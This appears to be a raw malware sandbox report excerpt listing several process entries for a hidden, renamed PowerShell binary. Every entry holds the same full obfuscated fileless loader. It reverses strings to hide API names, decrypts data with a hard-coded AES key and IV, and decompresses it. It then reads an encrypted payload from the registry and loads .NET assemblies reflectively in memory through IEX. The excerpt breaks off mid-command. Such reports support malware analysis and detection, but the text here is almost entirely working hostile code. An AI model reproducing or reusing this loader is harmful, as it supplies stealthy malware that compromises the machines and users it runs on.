[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$bZtha = $zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')();$VDekS = $bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VDekS, 0, $VDekS.Length);$bZtha.Dispose();$zAHbk.Dispose();$qbDkP = New-Object System.IO.MemoryStream(, $VDekS);$xZBvX = New-Object System.IO.MemoryStream;$OugwY = New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::$InvRe1);$OugwY.$igBFA($xZBvX);$OugwY.Dispose();$qbDkP.Dispose();$xZBvX.Dispose();$VDekS = $xZBvX.ToArray();$wDNpJ = $fYhvB | IEX;$HzAuX = $wDNpJ::$InvRe2($VDekS);$njNEM = $HzAuX.EntryPoint;$njNEM.$InvRe0($null, (, [string[]] ($mvSac)))
5⤵
PID:6060

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5928).WaitForExit();[System.Threading.Thread]::Sleep(5000); function QPIus($PJoKM){ $zAHbk=[System.Security.Cryptography.Aes]::Create(); $zAHbk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zAHbk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zAHbk.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8='); $zAHbk.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ=='); $bZtha=$zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')(); $rEqrJ=$bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PJoKM, 0, $PJoKM.Length); $bZtha.Dispose(); $zAHbk.Dispose(); $rEqrJ;}function bvLKH($PJoKM){ $qbDkP=New-Object System.IO.MemoryStream(,$PJoKM); $xZBvX=New-Object System.IO.MemoryStream; $OugwY=New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::Decompress); $OugwY.CopyTo($xZBvX); $OugwY.Dispose(); $qbDkP.Dispose(); $xZBvX.Dispose(); $xZBvX.ToArray();}function yOuXN($PJoKM,$TPKFP){ $HzAuX=[System.Reflection.Assembly]::Load([byte[]]$PJoKM); $njNEM=$HzAuX.EntryPoint; $njNEM.Invoke($null, $TPKFP);}$zAHbk1 = New-Object System.Security.Cryptography.AesManaged;$zAHbk1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$XATWs = $zAHbk1.('rotpyrceDetaerC'[-1..-15] -join '')();$InvRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K1CkLsbgHsaqjP07dOw2WA==');$InvRe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe, 0, $InvRe.Length);$InvRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe);$lHCNf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mgaXTEcchBwKiFfurNf/ZvU7pDIOIRUS5fl2vv2xXeE=');$lHCNf = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lHCNf, 0, $lHCNf.Length);$lHCNf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lHCNf);$mvSac = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SMFDBATqcCLCffiPgcVkeA==');$mvSac = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mvSac, 0, $mvSac.Length);$mvSac = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mvSac);$fYhvB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('m0/I7rIGbiBVxCE4WTkxKXrIhId+xRJu1rELFg0sRatzAZFJErBaN0cXbJ97o8zEIQUuHdn0E9FLwW/h/U1hc6jwkcijx4lE6VkAH1OJkts5kyb2YIRluw8m1KC/amNr0TCUnPudPp3KBcVKGDC8TzQuwcLP3xvVlp9FkaoWtmG/i2TedFhwHEgMOB09p7WNJA0Q1cbZD90fmmUxB03UL7S26YlUwLgKbUG2E+hkLUo2XBW1SjqK7s+7KIv+FxsKe1Q6epFglHVxCjSwGwIQAUvg2C1GxLbKYm14kxWUxy85/0FO+48f/xHK6Ka1ZeQ20mgOghTmQ9IpFjCI/zOREYShr3iKDdcQdquznhnOBRIW9QNSuxuM+GBRAkeVB3KmWlyH/45GbF7FqE/6zVPhshlGma0EpQE1qJQpZ79Dnyw=');$fYhvB = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fYhvB, 0, $fYhvB.Length);$fYhvB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fYhvB);$hBYHy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C9m3OdpGwFdHwPwMI02P1Q==');$hBYHy = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hBYHy, 0, $hBYHy.Length);$hBYHy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hBYHy);$mLgUM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnlbpdXHpcZ8OIW6I8JHEw==');$mLgUM = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mLgUM, 0, $mLgUM.Length);$mLgUM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mLgUM);$UJkfe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRq92anf130ThOkt+/oHfQ==');$UJkfe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJkfe, 0, $UJkfe.Length);$UJkfe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJkfe);$diyny = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOan84KwuQvybSDbMNzbwg==');$diyny = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diyny, 0, $diyny.Length);$diyny = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diyny);$igBFA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9I86vNBFZFkDSOaT6Axf1g==');$igBFA = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igBFA, 0, $igBFA.Length);$igBFA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igBFA);$InvRe0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YYa8OopsH+ndA18TV9aICA==');$InvRe0 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe0, 0, $InvRe0.Length);$InvRe0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe0);$InvRe1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2FAiKLQ+H7mhnGGHhuoROg==');$InvRe1 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe1, 0, $InvRe1.Length);$InvRe1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe1);$InvRe2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K4DD6mV1zT0l1FL5isTMSg==');$InvRe2 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe2, 0, $InvRe2.Length);$InvRe2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe2);$InvRe3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNPPHPCKJCXJeBbFBVQkNg==');$InvRe3 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe3, 0, $InvRe3.Length);$InvRe3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe3);$XATWs.Dispose();$zAHbk1.Dispose();$HsmvD = [Microsoft.Win32.Registry]::$diyny.$UJkfe($InvRe).$mLgUM($lHCNf);$aPQNt=[string[]]$HsmvD.Split('\');$Kpzfr=bvLKH(QPIus([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[1])));yOuXN $Kpzfr (,[string[]] ('%*'));$VDekS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[0]);$zAHbk = New-Object System.Security.Cryptography.AesManaged;$zAHbk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$bZtha = $zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')();$VDekS = $bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VDekS, 0, $VDekS.Length);$bZtha.Dispose();$zAHbk.Dispose();$qbDkP = New-Object System.IO.MemoryStream(, $VDekS);$xZBvX = New-Object System.IO.MemoryStream;$OugwY = New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::$InvRe1);$OugwY.$igBFA($xZBvX);$OugwY.Dispose();$qbDkP.Dispose();$xZBvX.Dispose();$VDekS = $xZBvX.ToArray();$wDNpJ = $fYhvB | IEX;$HzAuX = $wDNpJ::$InvRe2($VDekS);$njNEM = $HzAuX.EntryPoint;$njNEM.$InvRe0($null, (, [string[]] ($mvSac)))
5⤵
PID:4460

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5928).WaitForExit();[System.Threading.Thread]::Sleep(5000); function QPIus($PJoKM){ $zAHbk=[System.Security.Cryptography.Aes]::Create(); $zAHbk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zAHbk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zAHbk.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8='); $zAHbk.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ=='); $bZtha=$zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')(); $rEqrJ=$bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PJoKM, 0, $PJoKM.Length); $bZtha.Dispose(); $zAHbk.Dispose(); $rEqrJ;}function bvLKH($PJoKM){ $qbDkP=New-Object System.IO.MemoryStream(,$PJoKM); $xZBvX=New-Object System.IO.MemoryStream; $OugwY=New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::Decompress); $OugwY.CopyTo($xZBvX); $OugwY.Dispose(); $qbDkP.Dispose(); $xZBvX.Dispose(); $xZBvX.ToArray();}function yOuXN($PJoKM,$TPKFP){ $HzAuX=[System.Reflection.Assembly]::Load([byte[]]$PJoKM); $njNEM=$HzAuX.EntryPoint; $njNEM.Invoke($null, $TPKFP);}$zAHbk1 = New-Object System.Security.Cryptography.AesManaged;$zAHbk1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$XATWs = $zAHbk1.('rotpyrceDetaerC'[-1..-15] -join '')();$InvRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K1CkLsbgHsaqjP07dOw2WA==');$InvRe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe, 0, $InvRe.Length);$InvRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe);$lHCNf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mgaXTEcchBwKiFfurNf/ZvU7pDIOIRUS5fl2vv2xXeE=');$lHCNf = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lHCNf, 0, $lHCNf.Length);$lHCNf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lHCNf);$mvSac = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SMFDBATqcCLCffiPgcVkeA==');$mvSac = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mvSac, 0, $mvSac.Length);$mvSac = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mvSac);$fYhvB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('m0/I7rIGbiBVxCE4WTkxKXrIhId+xRJu1rELFg0sRatzAZFJErBaN0cXbJ97o8zEIQUuHdn0E9FLwW/h/U1hc6jwkcijx4lE6VkAH1OJkts5kyb2YIRluw8m1KC/amNr0TCUnPudPp3KBcVKGDC8TzQuwcLP3xvVlp9FkaoWtmG/i2TedFhwHEgMOB09p7WNJA0Q1cbZD90fmmUxB03UL7S26YlUwLgKbUG2E+hkLUo2XBW1SjqK7s+7KIv+FxsKe1Q6epFglHVxCjSwGwIQAUvg2C1GxLbKYm14kxWUxy85/0FO+48f/xHK6Ka1ZeQ20mgOghTmQ9IpFjCI/zOREYShr3iKDdcQdquznhnOBRIW9QNSuxuM+GBRAkeVB3KmWlyH/45GbF7FqE/6zVPhshlGma0EpQE1qJQpZ79Dnyw=');$fYhvB = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fYhvB, 0, $fYhvB.Length);$fYhvB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fYhvB);$hBYHy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C9m3OdpGwFdHwPwMI02P1Q==');$hBYHy = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hBYHy, 0, $hBYHy.Length);$hBYHy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hBYHy);$mLgUM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnlbpdXHpcZ8OIW6I8JHEw==');$mLgUM = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mLgUM, 0, $mLgUM.Length);$mLgUM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mLgUM);$UJkfe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRq92anf130ThOkt+/oHfQ==');$UJkfe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJkfe, 0, $UJkfe.Length);$UJkfe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJkfe);$diyny = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOan84KwuQvybSDbMNzbwg==');$diyny = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diyny, 0, $diyny.Length);$diyny = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diyny);$igBFA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9I86vNBFZFkDSOaT6Axf1g==');$igBFA = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igBFA, 0, $igBFA.Length);$igBFA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igBFA);$InvRe0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YYa8OopsH+ndA18TV9aICA==');$InvRe0 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe0, 0, $InvRe0.Length);$InvRe0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe0);$InvRe1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2FAiKLQ+H7mhnGGHhuoROg==');$InvRe1 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe1, 0, $InvRe1.Length);$InvRe1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe1);$InvRe2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K4DD6mV1zT0l1FL5isTMSg==');$InvRe2 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe2, 0, $InvRe2.Length);$InvRe2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe2);$InvRe3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNPPHPCKJCXJeBbFBVQkNg==');$InvRe3 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe3, 0, $InvRe3.Length);$InvRe3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe3);$XATWs.Dispose();$zAHbk1.Dispose();$HsmvD = [Microsoft.Win32.Registry]::$diyny.$UJkfe($InvRe).$mLgUM($lHCNf);$aPQNt=[string[]]$HsmvD.Split('\');$Kpzfr=bvLKH(QPIus([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[1])));yOuXN $Kpzfr (,[string[]] ('%*'));$VDekS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[0]);$zAHbk = New-Object System.Security.Cryptography.AesManaged;$zAHbk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$bZtha = $zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')();$VDekS = $bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VDekS, 0, $VDekS.Length);$bZtha.Dispose();$zAHbk.Dispose();$qbDkP = New-Object System.IO.MemoryStream(, $VDekS);$xZBvX = New-Object System.IO.MemoryStream;$OugwY = New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::$InvRe1);$OugwY.$igBFA($xZBvX);$OugwY.Dispose();$qbDkP.Dispose();$xZBvX.Dispose();$VDekS = $xZBvX.ToArray();$wDNpJ = $fYhvB | IEX;$HzAuX = $wDNpJ::$InvRe2($VDekS);$njNEM = $HzAuX.EntryPoint;$njNEM.$InvRe0($null, (, [string[]] ($mvSac)))
5⤵
PID:2856

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5928).WaitForExit();[System.Threading.Thread]::Sleep(5000); function QPIus($PJoKM){ $zAHbk=[System.Security.Cryptography.Aes]::Create(); $zAHbk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zAHbk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zAHbk.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8='); $zAHbk.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ=='); $bZtha=$zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')(); $rEqrJ=$bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PJoKM, 0, $PJoKM.Length); $bZtha.Dispose(); $zAHbk.Dispose(); $rEqrJ;}function bvLKH($PJoKM){ $qbDkP=New-Object System.IO.MemoryStream(,$PJoKM); $xZBvX=New-Object System.IO.MemoryStream; $OugwY=New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::Decompress); $OugwY.CopyTo($xZBvX); $OugwY.Dispose(); $qbDkP.Dispose(); $xZBvX.Dispose(); $xZBvX.ToArray();}function yOuXN($PJoKM,$TPKFP){ $HzAuX=[System.Reflection.Assembly]::Load([byte[]]$PJoKM); $njNEM=$HzAuX.EntryPoint; $njNEM.Invoke($null, $TPKFP);}$zAHbk1 = New-Object System.Security.Cryptography.AesManaged;$zAHbk1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$XATWs = $zAHbk1.('rotpyrceDetaerC'[-1..-15] -join '')();$InvRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K1CkLsbgHsaqjP07dOw2WA==');$InvRe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe, 0, $InvRe.Length);$InvRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe);$lHCNf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mgaXTEcchBwKiFfurNf/ZvU7pDIOIRUS5fl2vv2xXeE=');$lHCNf = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lHCNf, 0, $lHCNf.Length);$lHCNf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lHCNf);$mvSac = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SMFDBATqcCLCffiPgcVkeA==');$mvSac = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mvSac, 0, $mvSac.Length);$mvSac = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mvSac);$fYhvB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('m0/I7rIGbiBVxCE4WTkxKXrIhId+xRJu1rELFg0sRatzAZFJErBaN0cXbJ97o8zEIQUuHdn0E9FLwW/h/U1hc6jwkcijx4lE6VkAH1OJkts5kyb2YIRluw8m1KC/amNr0TCUnPudPp3KBcVKGDC8TzQuwcLP3xvVlp9FkaoWtmG/i2TedFhwHEgMOB09p7WNJA0Q1cbZD90fmmUxB03UL7S26YlUwLgKbUG2E+hkLUo2XBW1SjqK7s+7KIv+FxsKe1Q6epFglHVxCjSwGwIQAUvg2C1GxLbKYm14kxWUxy85/0FO+48f/xHK6Ka1ZeQ20mgOghTmQ9IpFjCI/zOREYShr3iKDdcQdquznhnOBRIW9QNSuxuM+GBRAkeVB3KmWlyH/45GbF7FqE/6zVPhshlGma0EpQE1qJQpZ79Dnyw=');$fYhvB = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fYhvB, 0, $fYhvB.Length);$fYhvB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fYhvB);$hBYHy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C9m3OdpGwFdHwPwMI02P1Q==');$hBYHy = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hBYHy, 0, $hBYHy.Length);$hBYHy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hBYHy);$mLgUM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnlbpdXHpcZ8OIW6I8JHEw==');$mLgUM = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mLgUM, 0, $mLgUM.Length);$mLgUM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mLgUM);$UJkfe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRq92anf130ThOkt+/oHfQ==');$UJkfe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJkfe, 0, $UJkfe.Length);$UJkfe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJkfe);$diyny = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOan84KwuQvybSDbMNzbwg==');$diyny = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diyny, 0, $diyny.Length);$diyny = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diyny);$igBFA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9I86vNBFZFkDSOaT6Axf1g==');$igBFA = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igBFA, 0, $igBFA.Length);$igBFA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igBFA);$InvRe0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YYa8OopsH+ndA18TV9aICA==');$InvRe0 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe0, 0, $InvRe0.Length);$InvRe0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe0);$InvRe1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2FAiKLQ+H7mhnGGHhuoROg==');$InvRe1 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe1, 0, $InvRe1.Length);$InvRe1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe1);$InvRe2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K4DD6mV1zT0l1FL5isTMSg==');$InvRe2 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe2, 0, $InvRe2.Length);$InvRe2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe2);$InvRe3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNPPHPCKJCXJeBbFBVQkNg==');$InvRe3 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe3, 0, $InvRe3.Length);$InvRe3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe3);$XATWs.Dispose();$zAHbk1.Dispose();$HsmvD = [Microsoft.Win32.Registry]::$diyny.$UJkfe($InvRe).$mLgUM($lHCNf);$aPQNt=[string[]]$HsmvD.Split('\');$Kpzfr=bvLKH(QPIus([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[1])));yOuXN $Kpzfr (,[string[]] ('%*'));$VDekS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[0]);$zAHbk = New-Object System.Security.Cryptography.AesManaged;$zAHbk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$bZtha = $zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')();$VDekS = $bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VDekS, 0, $VDekS.Length);$bZtha.Dispose();$zAHbk.Dispose();$qbDkP = New-Object System.IO.MemoryStream(, $VDekS);$xZBvX = New-Object System.IO.MemoryStream;$OugwY = New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::$InvRe1);$OugwY.$igBFA($xZBvX);$OugwY.Dispose();$qbDkP.Dispose();$xZBvX.Dispose();$VDekS = $xZBvX.ToArray();$wDNpJ = $fYhvB | IEX;$HzAuX = 